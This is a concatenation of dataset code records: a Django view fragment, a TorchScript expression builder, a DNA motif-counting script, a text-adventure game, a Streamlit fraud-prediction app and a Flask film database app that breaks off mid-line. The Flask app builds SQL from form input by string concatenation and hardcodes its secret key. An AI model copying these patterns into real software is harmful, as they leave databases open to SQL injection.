})\n\ndef ProductDetail(request, id, short_desc):\n product = get_object_or_404(Product, id=id, short_desc=short_desc, available=True)\n cart_product_form = CartAddProductForm()\n return render(request, 'shop/product/detail.html',\n {'product': product,\n 'cart_product_form':cart_product_form})","sub_path":"myownshop/shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"15460496","text":"import types\n\nimport torch\nfrom torch._C._jit_tree_views import (\n Apply,\n BinOp,\n Const,\n Expr,\n FalseLiteral,\n Ident,\n Select,\n Subscript,\n TrueLiteral,\n TupleLiteral,\n UnaryOp,\n)\n\nfrom pyctr.examples.torchscript import call_helper\nfrom pyctr.examples.torchscript.dmmy import dmmy_rng\nfrom pyctr.overloads import py_defaults\n\n\ndef gen_bin_op(op):\n def bin_op(this, other):\n return TorchExpr(BinOp(op, torch_expr(this), torch_expr(other)))\n\n return bin_op\n\n\ndef gen_method(name):\n def fun(this, *args, **kwargs):\n args = torch_expr(list(args))\n kwargs = call_helper.kwargs_to_attribute_list(kwargs)\n return TorchExpr(Apply(Select(this.node, Ident(dmmy_rng, name)), args, kwargs))\n\n return fun\n\n\n_operators = {\n \"__matmul__\": \"@\",\n \"__mul__\": \"*\",\n \"__add__\": \"+\",\n \"__sub__\": \"-\",\n \"__eq__\": \"==\",\n \"__ne__\": \"!=\",\n}\n\n\ndef add_operators(clazz):\n for o in _operators:\n setattr(clazz, o, gen_bin_op(_operators[o]))\n\n\ndef add_methods(clazz):\n _tmp = torch.ones(1)\n\n _attrs = dir(_tmp)\n\n for a in _attrs:\n if a[0] == \"_\":\n continue\n _typ = type(getattr(_tmp, a))\n if _typ == types.MethodType or _typ == types.BuiltinFunctionType:\n setattr(clazz, a, gen_method(a))\n\n\nclass TorchExpr:\n def __init__(self, node):\n if isinstance(node, Expr):\n self.node = node\n else:\n self.node = torch_expr(node)\n\n def __getitem__(self, item):\n return TorchExpr(Subscript(self.node, [torch_expr(item)]))\n\n def __neg__(self):\n return TorchExpr(UnaryOp(dmmy_rng, \"-\", self.node))\n\n\nadd_operators(TorchExpr)\nadd_methods(TorchExpr)\n\n\ndef torch_expr(e):\n ret = None\n\n # Constants\n if isinstance(e, bool):\n ret = TrueLiteral(dmmy_rng) if ret else FalseLiteral(dmmy_rng)\n elif isinstance(e, int) or isinstance(e, float):\n if e >= 0:\n ret = Const(dmmy_rng, str(e))\n else:\n ret = UnaryOp(dmmy_rng, \"-\", Const(dmmy_rng, str(abs(e))))\n elif isinstance(e, tuple):\n ret = TupleLiteral(dmmy_rng, list(map(lambda exp: torch_expr(exp), e)))\n elif isinstance(e, TorchExpr):\n ret = e.node\n elif isinstance(e, list):\n ret = list(map(lambda exp: torch_expr(exp), e))\n elif isinstance(e, Expr):\n ret = e\n elif isinstance(e, py_defaults.Variable):\n ret = torch_expr(e.val)\n else:\n raise TypeError(f\"Impossible to translate expression of type: {type(e)}\")\n return ret\n","sub_path":"pyctr/examples/torchscript/expression.py","file_name":"expression.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"357972909","text":"import genomicSignatures\nimport glob\n\n\n\n\ndef main():\n\n# (1) Prompt user to enter valid mer length\n\n merLength= 4\n\n\n#-------------------------------------------------------------------------------\n\n# (2) Get the files using glob and run through getDNA\n \n inputDIRECTORY= 'inputDIRECTORY3'\n fileList = glob.glob(inputDIRECTORY + '/*')\n fileList.sort()\n DNA= ''\n bugNumber= 0\n for nextFile in fileList:\n print(\"Opened a file\")\n DNA= genomicSignatures.getDNA(nextFile) \n\n#-------------------------------------------------------------------------------\n \n # (3) Break the read-in DNA into motifs\n \n originalMotifList= genomicSignatures.breakIntoMotifs(DNA, merLength)\n \n \n #-----------------------------------------------------------------------\n\n # (4) Count motifs\n \n originalMerFrequencies = {}\n \n genomicSignatures.countMotifs(originalMotifList, originalMerFrequencies)\n \n \n #------------------------------------------------------------------------\n \n # (6) \n \n \n \n\n #Create parallel lists for motif, frequencey, and proportion\n \n sortedMerFrequencies= sorted(originalMerFrequencies.items())\n numberOfMotifs= len(sortedMerFrequencies)\n if bugNumber == 0:\n sortedMotifList0= []\n sortedFrequencyList0= []\n for i in range (0,numberOfMotifs):\n merFrequencyTuple= sortedMerFrequencies[i] \n sortedMotifList0.append(merFrequencyTuple[0])\n sortedFrequencyList0.append(merFrequencyTuple[1])\n \n totalNumberOfMotifs= 0\n for anElement in sortedFrequencyList0:\n totalNumberOfMotifs= totalNumberOfMotifs + anElement\n \n proportionsList0= []\n for aFrequency in sortedFrequencyList0:\n proportion= aFrequency / totalNumberOfMotifs\n proportionsList0.append(proportion)\n \n print(\"Done with bug 1\")\n \n if bugNumber == 1:\n sortedMotifList1= []\n sortedFrequencyList1= []\n for i in range (0,numberOfMotifs):\n merFrequencyTuple= sortedMerFrequencies[i] \n sortedMotifList1.append(merFrequencyTuple[0])\n sortedFrequencyList1.append(merFrequencyTuple[1])\n \n totalNumberOfMotifs= 0\n for anElement in sortedFrequencyList1:\n totalNumberOfMotifs= totalNumberOfMotifs + anElement \n \n proportionsList1= []\n for aFrequency in sortedFrequencyList1:\n proportion= aFrequency / totalNumberOfMotifs\n proportionsList1.append(proportion) \n \n print(\"Done with bug 2\")\n \n if bugNumber == 2:\n sortedMotifList2= []\n sortedFrequencyList2= []\n for i in range (0,numberOfMotifs):\n merFrequencyTuple= sortedMerFrequencies[i] \n sortedMotifList2.append(merFrequencyTuple[0])\n sortedFrequencyList2.append(merFrequencyTuple[1])\n \n totalNumberOfMotifs= 0\n for anElement in sortedFrequencyList2:\n totalNumberOfMotifs= totalNumberOfMotifs + anElement \n \n proportionsList2= []\n for aFrequency in sortedFrequencyList2:\n proportion= aFrequency / totalNumberOfMotifs\n proportionsList2.append(proportion)\n\n print(\"Done with bug 3\")\n \n if bugNumber == 3:\n sortedMotifList3= []\n sortedFrequencyList3= []\n for i in range (0,numberOfMotifs):\n merFrequencyTuple= sortedMerFrequencies[i] \n sortedMotifList3.append(merFrequencyTuple[0])\n sortedFrequencyList3.append(merFrequencyTuple[1])\n \n totalNumberOfMotifs= 0\n for anElement in sortedFrequencyList3:\n totalNumberOfMotifs= totalNumberOfMotifs + anElement \n \n proportionsList3= []\n for aFrequency in sortedFrequencyList3:\n proportion= aFrequency / totalNumberOfMotifs\n proportionsList3.append(proportion)\n \n print(\"Done with bug 4\")\n \n if bugNumber == 4:\n sortedMotifList4= []\n sortedFrequencyList4= []\n for i in range (0,numberOfMotifs):\n merFrequencyTuple= sortedMerFrequencies[i] \n sortedMotifList4.append(merFrequencyTuple[0])\n sortedFrequencyList4.append(merFrequencyTuple[1])\n \n totalNumberOfMotifs= 0\n for anElement in sortedFrequencyList4:\n totalNumberOfMotifs= totalNumberOfMotifs + anElement \n \n \n proportionsList4= []\n for aFrequency in sortedFrequencyList4:\n proportion= aFrequency / totalNumberOfMotifs\n proportionsList4.append(proportion)\n \n print(\"Done with bug 5\")\n \n if bugNumber == 5:\n sortedMotifList5= []\n sortedFrequencyList5= []\n for i in range (0,numberOfMotifs):\n merFrequencyTuple= sortedMerFrequencies[i] \n sortedMotifList5.append(merFrequencyTuple[0])\n sortedFrequencyList5.append(merFrequencyTuple[1])\n \n totalNumberOfMotifs= 0\n for anElement in sortedFrequencyList5:\n totalNumberOfMotifs= totalNumberOfMotifs + anElement \n \n proportionsList5= []\n for aFrequency in sortedFrequencyList5:\n proportion= aFrequency / totalNumberOfMotifs\n proportionsList5.append(proportion)\n \n print(\"Done with bug 5\")\n \n if bugNumber == 6:\n sortedMotifList6= []\n sortedFrequencyList6= []\n for i in range (0,numberOfMotifs):\n merFrequencyTuple= sortedMerFrequencies[i] \n sortedMotifList6.append(merFrequencyTuple[0])\n sortedFrequencyList6.append(merFrequencyTuple[1])\n \n totalNumberOfMotifs= 0\n for anElement in sortedFrequencyList6:\n totalNumberOfMotifs= totalNumberOfMotifs + anElement \n \n proportionsList6= []\n for aFrequency in sortedFrequencyList6:\n proportion= aFrequency / totalNumberOfMotifs\n proportionsList6.append(proportion) \n \n bugNumber= bugNumber+1\n \n EXCEL = open(\"Vectors2.csv\", 'w')\n \n # print column headings\n EXCEL.write(\"Word\")\n EXCEL.write(\",\")\n EXCEL.write(\"Bug1\")\n EXCEL.write(\",\")\n EXCEL.write(\"Bug2\")\n EXCEL.write(\",\")\n EXCEL.write(\"Bug3\")\n EXCEL.write(\",\")\n EXCEL.write(\"Bug4\")\n EXCEL.write(\",\")\n EXCEL.write(\"Bug5\")\n EXCEL.write(\",\")\n EXCEL.write(\"Bug6\") \n EXCEL.write(\",\")\n EXCEL.write(\"Bug7\") \n EXCEL.write(\"\\n\") \n\n for i in range(0,256):\n EXCEL.write(str(sortedMotifList1[i]))\n EXCEL.write(',')\n if i < len(proportionsList0):\n EXCEL.write(str(proportionsList0[i])) \n EXCEL.write(',')\n if i < len(proportionsList1):\n EXCEL.write(str(proportionsList1[i]))\n EXCEL.write(',')\n if i < len(proportionsList2):\n EXCEL.write(str(proportionsList2[i]))\n EXCEL.write(',')\n if i < len(proportionsList3):\n EXCEL.write(str(proportionsList3[i]))\n EXCEL.write(',')\n if i < len(proportionsList4):\n EXCEL.write(str(proportionsList4[i]))\n EXCEL.write(',')\n if i < len(proportionsList5):\n EXCEL.write(str(proportionsList5[i]))\n EXCEL.write(',')\n if i < len(proportionsList6):\n EXCEL.write(str(proportionsList6[i])) \n EXCEL.write('\\n')\n \n \n EXCEL.close()\n \n \n \n \n \n \n \n \nmain()","sub_path":"portfolio/work02/Gillis_A6.1.py","file_name":"Gillis_A6.1.py","file_ext":"py","file_size_in_byte":8334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"200157457","text":"####################\n# CST-205 #\n# Module 5 Lab 12 #\n# Sevren Gail #\n# Chris Rendall #\n####################\n\nfrom random import randint\n\nclass Object: #These are objects found around the mansion.\n def __init__(self, name, description, permanence): #This constructor estabishes the name, description and permanence.\n self.name = name #This is the name of the object.\n self.description = description #This is the name of the object.\n self.permanence = permanence #This is the permanence of the object (whether an object can be removed from the room).\n self.uses = {} #This is a dictionary with a use (cause) as the key and the fallout (effect) as the value.\n \n def setName(self, name): #This is the mutator for the name.\n self.name = name\n \n def printName(self): #This prints the name.\n printNow(self.name)\n \n def getName(self): #This is the accessor for the name.\n return self.name\n \n def setDescription(self, description): #This is the mutator for the description.\n self.description = description\n \n def printDescription(self): #This prints the description.\n printNow(self.description)\n \n def getDescription(self): #This is the accessor for the description.\n return self.description\n \n def setPermanence(self, permanence): #This is the mutator for the permanence.\n self.permanence = permanence\n \n def getPermanence(self): #This is the accessor for the permanence.\n return self.permanence\n \n def setUse(self, use, fallout): #This is the mutator for the uses. It adds a key if one doesn't exist and sets the value.\n self.uses[use] = fallout\n\n def removeUse(self, use): #This lets you remove a use from an item.\n del self.uses[use]\n \n def getUses(self): #This is the accessor for the list of uses.\n return self.uses.keys()\n \n def getFallout(self, use): #This is the accessor for a specific use.\n return uses[use]\n\nclass Room: #These are rooms around the mansion.\n def __init__(self, name, description): #This constructor estabishes the name and description.\n self.name = name #This is the name of the room.\n self.description = description #This is the description of the room.\n self.directions = {} #This dictionary contains the directions you can go and the Rooms they lead to.\n self.objects = [] #These are the objects in the room.\n \n def setName(self, name): #This is the mutator for the name.\n self.name = name\n \n def printName(self): #This prints the name.\n printNow(self.name)\n \n def getName(self): #This is the accessor for the name.\n return self.name\n \n def setDescription(self, description): #This is the mutator for the description.\n self.description = description\n \n def printDescription(self): #This prints the description.\n printNow(self.description)\n \n def getDescription(self): #This is the accessor for the description.\n return self.description\n \n def getRoom(self, direction): #This returns the room that lies in the direction you want to go.\n return self.directions[direction]\n \n def setDirection(self, direction, room): #This creates a direction if one doesn't exist and sets the room there.\n self.directions[direction] = room\n \n def removeDirection(self, direction): #This removes a direction from the room.\n del self.directions[direction]\n \n def printDirections(self): #This prints the directions you can go.\n for direction in self.directions.keys():\n printNow(direction)\n\n def getDirections(self): #This returns the list of direction names.\n return self.directions.keys()\n \n def addObject(self, object): #This adds an object to the room.\n self.objects.append(object)\n \n def removeObject(self, object): #This removes an object from the room.\n if object in self.objects:\n self.objects.remove(object)\n \n def printObjects(self): #This prints the names of the objects in the room.\n for object in self.objects:\n object.printName()\n\n def getObjects(self): #This returns a list of objects in the room.\n return self.objects\n \n def fullyDescribe(self): #This prints a description that also includes the name, directions and objects\n printNow(\"------------\" + self.getName().upper() + \"------------\")\n self.printDescription()\n printNow(\"\")\n if len(self.objects) == 0:\n printNow(\"There are no objects in this room.\")\n else:\n printNow(\"Here are the objects in the room:\")\n self.printObjects()\n printNow(\"\")\n if len(self.directions) == 0:\n printNow(\"You can't see a way out. Bummer!\")\n else:\n printNow(\"Here are the directions you can go:\")\n self.printDirections()\n\ndef help(): #This prints the intro and directions.\n #The intro is the introductory statement that explains the premise of the game.\n intro = \"Your millionaire father has passed away. You have now realized that if you do not find his will, your \"\n intro += \"young stepmother will fabricate one and take everything. Right now your stepmother is working to acquire \"\n intro += \"an eviction notice to remove you from this house. You remember your father telling you that he hid it in \"\n intro += \"the library of his mansion. If you do not find the will soon, there is no hope.\"\n #These instructions tell how to play the game.\n instructions = \"You can move around the house by indicating a direction to move (ex: Move North). \"\n instructions += \"Feel free to abbreviate the commands (ex: Move n). \"\n instructions += \"You can also look at objects around the house (ex: Look At Table) and pick up some of them (ex: Pick Up Sandwich). \"\n instructions += \"Type inventory to see what you're holding. Try other commands too, like pull, push, open, use, etc... \"\n instructions += \"Type help at any time to see these directions again.\"\n printNow(intro)\n printNow(\"\")\n printNow(instructions)\n\ndef move(direction): #This moves the user to the room in the indicated direction if the direction is valid.\n global room\n validDirections = [\"north\", \"south\", \"east\", \"west\", \"up\", \"down\", \"n\", \"s\", \"e\", \"w\", \"u\", \"d\"]\n if direction == \"n\":\n direction = \"north\"\n if direction == \"s\":\n direction = \"south\"\n if direction == \"e\":\n direction = \"east\"\n if direction == \"w\":\n direction = \"west\"\n if direction == \"u\":\n direction = \"up\"\n if direction == \"d\":\n direction = \"down\"\n roomDirections = room.getDirections()\n for i in range(0, len(roomDirections)):\n roomDirections[i] = roomDirections[i].lower()\n if direction == \" \":\n printNow(\"Move where?\")\n elif validDirections.count(direction) == 0:\n printNow(\"That's not a direction...\")\n elif roomDirections.count(direction) == 0:\n printNow(\"You cannot move that direction in this room.\")\n else:\n room = room.getRoom(direction.capitalize())\n\ndef useCrowbar(): #This allows a user who has the crowbar in the library to move the bookshelf.\n global room\n global inventory\n global bookshelfMoved\n if room.getName() != \"Library\":\n printNow(\"You cannot use the crowbar here.\")\n else:\n for object in room.getObjects():\n if object.getName() == \"Bookshelf\":\n printNow(\"You use the crowbar to move the bookshelf, revealing a safe that was hidden behind it.\")\n printNow(\"The crowbar breaks just as the shelf moves aside.\")\n bookshelfMoved = true\n room.setDescription(getLibraryDescription())\n room.removeObject(object)\n room.addObject(Object(\"Safe\", \"A sturdy looking standard dial safe. The words, \\\"kitchen, bathroom, bedroom\\\" are scrawled on it.\", true))\n removeInventory(\"Crowbar\")\n \ndef removeInventory(item): #This removes object with name item from the inventory.\n global inventory\n for o in inventory:\n if o.getName() == item:\n inventory.remove(o)\n\ndef use(modifiers): #This calls useCrowbar when the user types use crowbar.\n global inventory\n if modifiers[0] == \"crowbar\":\n for object in inventory:\n if object.getName() == \"Crowbar\":\n useCrowbar()\n \ndef displayInventory(): #This prints the inventory objects.\n global inventory\n if len(inventory) == 0:\n printNow(\"You have nothing in you inventory. How sad...\")\n else:\n printNow(\"You have the following in your inventory:\")\n for object in inventory:\n printNow(object.getName())\n\ndef open(modifiers): #Open the safe if the user is in the library and the bookshelf is moved and the safe is closed.\n global kitchenNumber\n global bathroomNumber\n global bedroomNumber\n global room\n global bookshelfMoved\n global safeOpen\n safeFound = false\n if modifiers[0].lower() == \"safe\":\n for o in room.getObjects():\n if o.getName() == \"Safe\":\n safeFound = true\n if safeOpen:\n printNow(\"The safe is already open...\")\n else:\n number1 = requestInteger(\"Enter the first number of the combination:\")\n number2 = requestInteger(\"Enter the second number of the combination:\")\n number3 = requestInteger(\"Enter the third number of the combination:\")\n if number1 == kitchenNumber and number2 == bathroomNumber and number3 == bedroomNumber:\n printNow(\"As you open up the safe you see a big red button inside.\")\n room.setDescription(getLibraryDescription())\n room.addObject(Object(\"Button\", \"An invitingly bright red button.\", true))\n else:\n printNow(\"That... didn't work. Did you just make those numbers up?\")\n if not safeFound:\n printNow(\"There is no safe here...\")\n else:\n printNow(\"You cannot open that...\")\n\ndef push(modifiers): #Push the button if user is in the Library and the safe is open.\n global room\n global safeOpen\n global trapDoorOpen\n buttonFound = false\n if modifiers[0].lower() == \"button\":\n for o in room.getObjects():\n if o.getName() == \"Button\":\n buttonFound = true\n if trapDoorOpen:\n printNow(\"You press the button, but nothing happens.\")\n else:\n printNow(\"As you push the button, a cleverly hidden trap door pops open in the middle of the floor.\")\n trapDoorOpen = true\n room.setDescription(getLibraryDescription())\n basement = Room(\"Basement\", \"The basement is a small dark room with a writing table. On it lies your father's will.\")\n basement.setDirection(\"Up\", room)\n basement.addObject(Object(\"Father's Will\", \"\", false))\n room.setDirection(\"Down\", basement)\n if not buttonFound:\n printNow(\"There is no button here...\")\n else:\n printNow(\"Pushing that does nothing...\")\n\ndef performAction(action, modifiers): #This takes parsed actions and modifiers and performs the appropriate task.\n if len(modifiers) == 0:\n modifiers.append(\" \")\n moveActions = [\"move\", \"go\", \"travel\", \"walk\"]\n helpActions = [\"help\", \"?\"]\n directionActions = [\"north\", \"south\", \"east\", \"west\", \"up\", \"down\", \"n\", \"e\", \"s\", \"w\", \"u\", \"d\"]\n lookActions = [\"look\", \"l\", \"examine\", \"look\"]\n dropActions = [\"drop\"]\n pickupActions = [\"pickup\", \"get\"]\n inventoryActions = [\"inventory\", \"i\", \"inv\", \"equipment\", \"backpack\"]\n pullActions = [\"pull\"]\n useActions = [\"use\"]\n openActions = [\"open\"]\n pushActions = [\"push\", \"press\"]\n if moveActions.count(action.lower()) > 0:\n move(modifiers[0])\n elif directionActions.count(action.lower()) > 0:\n move(action)\n elif helpActions.count(action) > 0:\n help()\n elif lookActions.count(action) > 0:\n look(modifiers)\n elif useActions.count(action) > 0:\n use(modifiers)\n elif openActions.count(action) > 0:\n open(modifiers)\n elif pushActions.count(action) > 0:\n push(modifiers)\n elif pickupActions.count(action) > 0:\n pickup(modifiers)\n elif inventoryActions.count(action) > 0:\n displayInventory()\n elif pullActions.count(action) > 0:\n pull(modifiers)\n else: \n printNow(\"You can't do that...\")\n\ndef pull(modifiers): #Pull the latch if the user is in the library and the latch is unpulled.\n global latchPulled\n global room\n if modifiers[0] == \" \":\n printNow(\"Pull what?\")\n elif modifiers[0] == \"latch\" and room.getName() == \"Library\" and latchPulled == false:\n printNow(\"You pull the latch and a trap door opens leading upward and a ladder extends down to the floor.\")\n attic = Room(\"Attic\", \"A dark and dusty room with a small amount of light coming in through a window at the top of the room.\")\n attic.setDirection(\"Down\", room)\n attic.addObject(Object(\"Crowbar\", \"A rusty steel crowbar that's seen better days.\", false))\n room.setDirection(\"Up\", attic)\n for o in room.getObjects():\n if o.getName() == \"Latch\":\n room.removeObject(o)\n latchPulled = true\n room.setDescription(getLibraryDescription())\n else:\n printNow(\"There is no \" + modifiers[0] + \" here.\")\n \ndef look(modifiers): #Print the description of modifier if it exists.\n global room\n object = modifiers[0]\n objects = room.getObjects()\n objectFound = false\n for i in range(0, len(objects)):\n if objects[i].getName().lower() == object:\n printNow(objects[i].getDescription())\n objectFound = true\n if(not objectFound):\n printNow(\"There is no object by that name here...\")\n\ndef pickup(modifier): #Add the item to inventory and remove from room if it exists and is not permanent.\n global room\n global inventory\n objectFound = false\n for object in room.getObjects():\n if object.getName().lower() == modifier[0]:\n if object.getPermanence() == false:\n inventory.append(object)\n printNow(\"You pick up the \" + object.getName())\n objectFound = true\n room.removeObject(object)\n else:\n printNow(object.getName() + \" will not fit in your inventory...\")\n objectFound = true\n if not objectFound and modifier[0] != \" \":\n printNow(\"There is no \" + modifier[0] + \" here.\")\n elif not objectFound and modifier[0] == \" \":\n printNow(\"Pick up what?\")\n\ndef parseCommand(commandList): #This parses the command.\n verb = commandList[0]\n modifiers = commandList\n modifiers.pop(0)\n performAction(verb, modifiers)\n\ndef fixCommand(command): #This cleans up the command to make it easier to parse.\n command = command.replace(\"pick up\", \"pickup\")\n command = command.replace(\"look at\", \"look\")\n command = command.replace(\"the \", \"\")\n return command\n\ndef initializeRooms(): #This sets up the rooms initially.\n global kitchenNumber\n global bathroomNumber\n global bedroomNumber\n library = Room(\"Library\", getLibraryDescription())\n kitchen = Room(\"Kitchen\", \"You are in the kitchen. There is a large stainless steel refrigerator.\")\n bedroom = Room(\"Bedroom\", \"You are in your father's bedroom. There is a large bed in the corner.\")\n entryway = Room(\"Entryway\", \"You are in the entryway to your father's mansion. There is a large door to the south.\")\n bathroom = Room(\"Bathroom\", \"You are in the bathroom. There is a large bathtub. The toilet is spotless.\")\n outside = Room(\"Outside\", \"You are outside. Your stepmother is there with the eviction notice. She locks you outside. How cold!\")\n library.setDirection(\"West\", kitchen)\n library.setDirection(\"East\", bathroom)\n library.setDirection(\"North\", bedroom)\n library.setDirection(\"South\", entryway)\n library.addObject(Object(\"Table\", \"A table made of old oak covered in a film of dust.\", true))\n library.addObject(Object(\"Bookshelf\", \"A bookshelf that seems slightly offset.\", true))\n library.addObject(Object(\"Latch\", \"A latch extending down from the ceiling.\", true))\n kitchen.setDirection(\"East\", library)\n kitchen.addObject(Object(\"Refrigerator\", \"A large stainless steel refrigerator with fridge magnet showing the number \" + str(kitchenNumber), true))\n bedroom.setDirection(\"South\", library)\n bedroom.addObject(Object(\"Bed\", \"A large bed covered by a plush comforter carefully embroidered with the number \" + str(bedroomNumber), true))\n bathroom.setDirection(\"West\", library)\n bathroom.addObject(Object(\"Bathtub\", \"A sizeable bath tub with a state of the art faucet.\", true))\n bathroom.addObject(Object(\"Toilet\", \"A spotless toilet. While it looks clean, it clearly stinks like the number \" + str(bathroomNumber), true))\n entryway.setDirection(\"North\", library)\n entryway.setDirection(\"South\", outside)\n return library\n \ndef getLibraryDescription(): #This returns the current description of the library.\n global bookshelfMoved\n global latchPulled\n global trapDoorOpen\n description = \"You find yourself in a room surrounded by bookshelves.\"\n if bookshelfMoved:\n description += \" There is a large sturdy dial safe in the wall.\"\n else:\n description += \" There is a bookshelf that is slightly offset.\"\n if latchPulled:\n description += \" There is a ladder leading upward.\"\n else:\n description += \" In the ceiling there is a latch that looks just within reach.\"\n if trapDoorOpen:\n description += \" A trap door gapes invitingly in the center of the floor.\"\n return description\n\ndef playGame(): #This is the main loop.\n global room\n continuePlaying = true\n inventory = []\n while(continuePlaying):\n printNow(\"\")\n room.fullyDescribe()\n printNow(\"\")\n if room.getName() == \"Basement\":\n printNow(\"You have found your father's will! Congratulations!\")\n if randint(1,10) > 5:\n printNow(\"It says that you inherit everything! Score!\")\n else:\n printNow(\"It says... that your step mom inherits everything... Let's just forget we found this, eh?\")\n continuePlaying = false\n elif room.getName() == \"Outside\":\n printNow(\"You facepalm your shortsightedness in coming outside. Oh, well. You probably wouldn't appreciate that fortune anyways.\")\n continuePlaying = false\n else:\n try:\n command = requestString(\"Enter a command:\").lower()\n if(command != \"exit\"):\n command = fixCommand(command)\n parseCommand(command.split(' '))\n else:\n printNow(\"You gave up? I guess a multi-million dollar estate is overrated, right?\")\n continuePlaying = false\n except:\n printNow(\"You gave up? I guess a multi-million dollar estate is overrated, right?\")\n continuePlaying = false\n\nkitchenNumber = randint(1,99) #This is the number found in the kitchen.\nbathroomNumber = randint(1,99) #This is the number found in the bathroom.\nbedroomNumber = randint(1,99) #This is the number found in the bedroom.\nbookshelfMoved = false #This turns true when the user moves the bookshelf in the library.\nlatchPulled = false #This turns true when the user pulls the latch in the library.\ntrapDoorOpen = false #This turns true when the user opens the trap door in the library.\nsafeOpen = false #This turns true when the user opens the safe in the library.\nroom = initializeRooms() #This is the current room that the user is in.\ninventory = [] #This is a list containing the objects carried by the user.\nhelp()\nplayGame()","sub_path":"mod5lab12.py","file_name":"mod5lab12.py","file_ext":"py","file_size_in_byte":18787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"236328473","text":"import streamlit as st\nfrom pycaret.classification import *\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\n\nmodel = load_model('modelCB')\n\ndef predict(model, input_df):\n predictions_df = predict_model(estimator=model, data=input_df)\n predictions = predictions_df['Label'][0]\n return predictions\n\ndef run():\n\n from PIL import Image\n image = Image.open('fd.jpg')\n image_fd = Image.open('ifd.jpg')\n image_JA = Image.open('J&A.jpg')\n image_fraude = Image.open('Fraude.jpg')\n\n st.image(image_JA,use_column_width=False)\n\n add_selectbox = st.sidebar.selectbox(\n \"How would you like to predict?\",\n (\"Online\", \"Batch\"))\n\n st.sidebar.info('As part of our consulting offer in Fraud Detection, at J&A we help industrial companies, banks, insurances and other financial institutions define strategies depending on their size and future perspectives, in order to better adapt to their needs. This not only permits us to deliver the best solution for every client as it is today (current level of maturity in Fraud Detection), but also establishes a path for its evolution in Fraud Detection solutions through time.')\n st.sidebar.success('J&A')\n \n st.sidebar.image(image_fraude)\n\n st.title(\"Insurance fraud Prediction App by J&A\")\n\n if add_selectbox == 'Online':\n\n incident_severity=st.selectbox('incident_severity', [0,1,2,3])\n insured_hobbies=st.selectbox('insured_hobbies', ['reading', 'paintball', 'exercise', 'bungie-jumping', 'camping', 'movies', 'golf', 'kayaking', 'yachting', 'hiking', 'video-games', 'skydiving', 'base-jumping', 'board-games', 'polo', 'chess', 'dancing', 'sleeping', 'cross-fit', 'basketball'])\n capital_loss=st.number_input('capital_loss', min_value=0, max_value=115000, value=25)\n policy_annual_premium=st.number_input('policy_annual_premium', min_value=400, max_value=2100, value=1000)\n collision_type=st.selectbox('collision_type', ['Rear Collision','Side Collision','Front Collision','undocumented'])\n incident_state=st.selectbox('incident_state', ['NY','SC','WV','VA','NC','PA','OH'])\n loss_by_claims=st.number_input('loss_by_claims', min_value=-40000, max_value=110000, value=0)\n property_claim=st.number_input('property_claim', min_value=0, max_value=24000, value=0)\n \n\n output=\"\"\n\n input_dict = {'incident_severity' : incident_severity, 'insured_hobbies' : insured_hobbies, 'capital_loss' : capital_loss, 'policy_annual_premium' : policy_annual_premium, 'collision_type' : collision_type, 'incident_state' : incident_state, 'property_claim' : property_claim, 'loss_by_claims' : loss_by_claims}\n input_df = pd.DataFrame([input_dict])\n\n if st.button(\"Predict\"):\n output = predict(model=model, input_df=input_df)\n output = '(Fraud -> 1 or Not Fraud -> 0) The fraud prediction is :' + str(output)\n\n st.success('The output is {}'.format(output))\n\n if add_selectbox == 'Batch':\n\n file_upload = st.file_uploader(\"Upload csv file for predictions\", type=[\"csv\"])\n\n if file_upload is not None:\n data = pd.read_csv(file_upload)\n predictions = predict_model(estimator=model,data=data)\n st.write(predictions)\n\nif __name__ == '__main__':\n run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"441513634","text":"from flask import Flask, render_template, url_for, flash\nfrom flask import request\nfrom db_connector.db_connector import connect_to_database, execute_query\nimport logging\nimport string\n#create the web application\nwebapp = Flask(__name__)\nwebapp.secret_key = 'vxBQYZpvBn'\n\n@webapp.route('/')\ndef home():\n return render_template('index.html')\n\n@webapp.route('/films', methods=['POST','GET'])\n#the name of this function is just a cosmetic thing\ndef films():\n db_connection = connect_to_database()\n\n if request.method == 'POST' and request.form.get('deleteButton') == None:\n # Film being added\n title = request.form['title']\n language = request.form['language']\n year = request.form['year']\n runtime = request.form['runtime']\n insert_query = 'INSERT INTO film (title, language, year, runtime) VALUES (%s,%s,%s,%s)'\n data = (title, language, year, runtime)\n execute_query(db_connection, insert_query, data)\n flash('Film added!');\n elif request.method == 'POST':\n # Film being deleted\n deleteID = request.form['deleteButton']\n delete_query = \"DELETE FROM film WHERE id = \" + deleteID + \";\"\n execute_query(db_connection, delete_query);\n\n # Display films in DB\n query = \"SELECT id, title, language, year, runtime from film;\"\n result = execute_query(db_connection, query).fetchall();\n print(result)\n return render_template('films.html', rows=result)\n\n@webapp.route('/genre', methods=['POST','GET'])\ndef genre():\n db_connection = connect_to_database()\n genre_selected = 1 # Default genre for showing films if not otherwise specified\n \n if request.method == 'POST' and request.form.get('composite_film_select') != None:\n # Add relationship into the film_genre composite table\n film_selected = request.form.get('composite_film_select')\n genre_selected = request.form.get('composite_genre_select')\n composite_insert_query = 'INSERT INTO film_genres (genre_id, film_id) VALUES (%s,%s)'\n data = (genre_selected, film_selected)\n print(\"Executing query\")\n execute_query(db_connection, composite_insert_query, data)\n elif request.method == 'POST' and request.form.get('name') != None:\n # Add genre to genre table\n name = request.form['name']\n description = request.form['description']\n insert_query = 'INSERT INTO genre (name, description) VALUES (%s,%s)'\n data = (name, description)\n execute_query(db_connection, insert_query, data)\n elif request.method == 'POST':\n # If this is not an INSERT, just show the films in selected genre\n genre_selected = request.form.get('genre_select')\n\n # Genre dropdown\n query = \"SELECT id, name FROM genre;\"\n result = execute_query(db_connection, query).fetchall()\n print(result)\n\n # Film dropdown\n film_query = \"SELECT id, title FROM film;\"\n film_results = execute_query(db_connection, film_query).fetchall()\n\n # Show films in given genre\n query2 = \"SELECT id, title, language, year, runtime FROM film f INNER JOIN film_genres g ON f.id = g.film_id AND g.genre_id = %s\" % (genre_selected)\n result2 